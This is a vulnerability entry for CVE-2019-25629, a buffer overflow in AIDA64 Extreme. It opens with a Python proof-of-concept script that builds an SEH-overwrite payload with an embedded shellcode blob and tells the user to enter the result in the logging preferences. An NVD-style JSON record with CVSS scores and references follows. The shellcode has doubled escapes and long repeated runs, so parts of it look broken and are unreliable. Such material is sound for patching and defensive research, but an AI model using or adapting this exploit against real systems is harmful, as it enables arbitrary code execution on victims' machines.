CVE-2019-25629

import sys import struct # Proof of Concept generator for CVE-2019-25629 # This script generates a malicious string to trigger SEH overflow def generate_payload(): # Offset to SEH handler (based on vulnerability analysis) offset = 4061 # SEH overwrite sequence # 0xEB 0x06 0x90 0x90 = JMP SHORT +6 + NOP + NOP seh_handler = struct.pack('<L', 0x909006EB) # POP POP RET address (universal or specific to AIDA64 module) # Placeholder address, needs to be replaced with valid address from vulnerable module seh_address = struct.pack('<L', 0x1001FFFF) # Example Shellcode (calc.exe) shellcode = b"\xdb\xc0\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x43" shellcode += b"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" shellcode += b"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" shellcode += b"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30" shellcode += b"\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4d\x43\x50\x55\x50" shellcode += b"\x43\x30\x43\x30\x4c\x4b\x57\x30\x56\x50\x4c\x4b\x55\x30\x54" shellcode += b"\x4c\x4c\x4b\x51\x50\x56\x50\x4c\x4b\x51\x55\x47\x4c\x4c\x4b\x50" shellcode += b"\x54\x54\x34\x4c\x4b\x55\x55\x57\x58\x56\x51\x4a\x4f\x4c\x4b\x56" shellcode += b"\x52\x4a\x4b\x4c\x46\x51\x4d\x4c\x4b\x57\x30\x56\x30\x4e\x4b\x51" shellcode += b"\x50\x54\x4c\x4c\x4b\x51\x50\x54\x4c\x4c\x4b\x51\x50\x45\x4c\x4e" shellcode += b"\x4b\x51\x4d\x56\x56\x50\x48\x4e\x56\x4e\x56\x4e\x36\x4b\x4f\x50" shellcode += b"\x51\x4c\x36\x4f\x30\x49\x4c\x4e\x4c\x31\x5a\x56\x58\x4d\x4c\x42" shellcode += b"\x55\x4a\x56\x56\x51\x4b\x4f\x46\x51\x4f\x30\x4e\x4c\x57\x4c\x43" shellcode += b"\x51\x52\x56\x4c\x31\x50\x56\x51\x4b\x4f\x4e\x4c\x4f\x34\x4b\x4f" shellcode += b"\x55\x4f\x56\x59\x50\x55\x4e\x34\x54\x56\x44\x43\x4b\x51\x4b\x4f" shellcode += b"\x4e\x50\x4c\x4e\x42\x4c\x51\x30\x53\x4c\x4b\x51\x57\x50\x53\x4b" shellcode += b"\x4f\x4e\x4c\x42\x51\x50\x4c\x53\x54\x4e\x52\x45\x58\x55\x35\x51" shellcode += b"\x4d\x4d\x4d\x4b\x4f\x48\x55\x47\x4c\x45\x56\x43\x4c\x44\x4a\x4d" shellcode += b"\x50\x49\x48\x4c\x47\x4f\x4b\x4f\x4e\x35\x4f\x4b\x4a\x50\x48\x35" shellcode += b"\x49\x32\x51\x56\x53\x58\x4e\x53\x45\x42\x33\x58\x4e\x36\x45\x32" shellcode += b"\x45\x51\x33\x58\x4e\x44\x44\x55\x49\x52\x4e\x32\x43\x4b\x4f\x48" shellcode += b"\x55\x45\x31\x4b\x4f\x4e\x35\x43\x58\x45\x30\x45\x50\x56\x30\x56" shellcode += b"\x30\x52\x48\x54\x31\x4c\x4b\x52\x4f\x4f\x47\x4b\x4f\x48\x55\x4f" shellcode += b"\x4f\x4f\x4f\x4e\x69\x52\x36\x50\x56\x50\x56\x50\x43\x42\x47\x52" shellcode += b"\x57\x45\x38\x43\x54\x42\x43\x51\x43\x4b\x4f\x4e\x35\x45\x38\x43" shellcode += b"\x53\x42\x52\x42\x55\x51\x30\x51\x55\x51\x55\x43\x53\x47\x4c\x4e" shellcode += b"\x49\x4d\x50\x4e\x50\x42\x54\x50\x55\x42\x4e\x51\x4d\x51\x4c\x45" shellcode += b"\x52\x56\x57\x50\x56\x51\x4c\x44\x42\x44\x51\x4b\x4f\x48\x55\x46" shellcode += b"\x58\x4c\x4b\x51\x4f\x51\x30\x46\x30\x56\x30\x56\x30\x42\x48\x4a" shellcode += b"\x52\x54\x4e\x43\x59\x42\x54\x46\x51\x4b\x4f\x4e\x35\x46\x52\x4b" shellcode += b"\x4f\x50\x52\x50\x50\x50\x50\x50\x42\x4e\x42\x58\x42\x4e\x42\x54" shellcode += b"\x42\x4e\x42\x4e\x51\x43\x42\x4e\x42\x4e\x42\x4e\x42\x4e\x42\x4e" shellcode += b"\x42\x4e\x42\x4e\x42\x4e\x42\x4e\x42\x4e\x42\x4e\x42\x4e\x4b\x58" shellcode += b"\x43\x42\x51\x43\x42\x4e\x42\x4e\x4d\x59\x4b\x55\x42\x54\x4b\x4f" shellcode += b"\x48\x55\x47\x54\x43\x57\x42\x4e\x42\x48\x43\x57\x44\x4e\x42\x55" shellcode += b"\x4b\x4f\x48\x55\x45\x38\x51\x4b\x50\x54\x51\x44\x45\x38\x43\x55" shellcode += b"\x4b\x4f\x48\x55\x45\x52\x42\\x45\x4b\x4f\x4e\x35\x50\\x4b\x4f" shellcode += b"\x48\x55\x47\x30\x51\\x4b\x4f\x4e\x35\x45\x38\x45\x58\x45\x58" shellcode += b"\x56\x4c\x56\x50\x4b\x4f\x48\x55\x4c\x4b\x51\x4f\x50\\x4b\x4f" shellcode += b"\x4e\x35\x4f\x4b\x4a\x50\x48\x35\x49\x48\x4b\x4f\x4e\x35\x4f\x4b" shellcode += b"\x50\x57\x4b\x4f\x4e\x35\\x43\x58\x43\\x43\x4e\x4e\x50\x4b\x4f" shellcode += b"\x48\x55\\x45\x38\x4a\x30\x45\x51\x4b\x4f\x4e\x35\x4f\x4b\x50\x57" shellcode += b"\x4b\x4f\x48\x55\\x43\x54\x45\\x43\x4e\x4e\x50\\x4b\x4f\x48\x55" shellcode += b"\x45\\x43\x45\\x43\x4e\x4e\x50\\x4b\x4f\x48\x55\x45\\x43\x45\\x43" shellcode += b"\x4e\x4e\x50\\x4b\x4f\x48\x55\x45\\x43\x45\\x43\x4e\x4e\x50\\x4b" shellcode += b"\x4f\x48\x55\x45\\x43\x45\\x43\x4e\x4e\x50\\x4b\x4f\x48\x55" # Padding payload = b"A" * offset + seh_handler + seh_address + shellcode return payload if __name__ == "__main__": # Generate the malicious path string evil_path = generate_payload() print(f"Generated Malicious Path Length: {len(evil_path)}") print("Use this path in the AIDA64 Hardware Monitoring Logging Preferences.")

{"cve": {"id": "CVE-2019-25629", "sourceIdentifier": "[email protected]", "published": "2026-03-24T12:16:02.997", "lastModified": "2026-03-27T16:59:03.243", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "AIDA64 Extreme 5.99.4900 contains a structured exception handler buffer overflow vulnerability in the logging functionality that allows local attackers to execute arbitrary code by supplying a malicious CSV log file path. Attackers can inject shellcode through the Hardware Monitoring logging preferences to overflow the buffer and trigger code execution when the application processes the log file path."}, {"lang": "es", "value": "AIDA64 Extreme 5.99.4900 contiene una vulnerabilidad de desbordamiento de búfer en el gestor de excepciones estructuradas en la funcionalidad de registro que permite a atacantes locales ejecutar código arbitrario al proporcionar una ruta de archivo de registro CSV maliciosa. Los atacantes pueden inyectar shellcode a través de las preferencias de registro de Monitorización de Hardware para desbordar el búfer y desencadenar la ejecución de código cuando la aplicación procesa la ruta del archivo de registro."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aida64:aida64:5.99.4900:*:*:*:extreme:*:*:*", "matchCriteriaId": "59100A69-BA3C-4B96-B6E5-168C39A2161B"}]}]}], "references": [{"url": "http://download.aida64.com/aida64extreme599.exe", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.aida64.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46660", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/aida64-extreme-seh-buffer-overflow-via-logging", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}